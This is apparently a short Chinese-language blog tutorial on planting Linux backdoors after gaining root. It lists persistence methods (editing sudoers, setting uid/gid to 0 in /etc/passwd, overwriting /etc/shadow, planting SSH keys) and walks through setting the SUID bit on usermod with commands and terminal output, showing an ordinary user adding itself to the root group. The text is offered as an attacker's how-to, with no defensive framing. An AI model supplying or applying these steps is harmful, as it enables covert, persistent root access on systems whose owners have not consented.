Linux之SUID后门

SUID可以用来做后门,前提是你已经获取了root权限,且给予s权限的文件必须为二进制 0x00 为二进制文件添加s权限从而提升为root权限 写sudoers添加用户 //最佳方案 vim /etc/passwd //将uid和gid改为0 vim /etc/shadow //密文覆盖 vim root .ssh/证书文件 .ssh这个文件夹和证书的权限要正确,要和原来一致 0x01 SUID主要作用可以是留后门 在root权限下给usermod一个s权限 # which usermod #得到usermod的路径 /usr/sbin/usermod # chmod u+s /usr/sbin/usermod # ls -l /usr/sbin/usermod -rwsr-x---. 1 root root 98680 Dec 7 2011 /usr/sbin/usermod usermod给其他人一个x权限 [root@localhost ~]# chmod o+x /usr/sbin/usermod [root@localhost ~]# ls -l /usr/sbin/usermod -rwsr-x--x. 1 root root 98680 Dec 7 2011 /usr/sbin/usermod 切换到普通用户wyb [wyb@localhost ~]$ id wyb uid=500(wyb) gid=500(wyb) groups=500(wyb) [wyb@localhost ~]$ usermod -g root wyb [wyb@localhost ~]$ id wyb uid=500(wyb) gid=0(root) groups=0(root) [wyb@localhost ~]$ exit 验证



可以返回顶部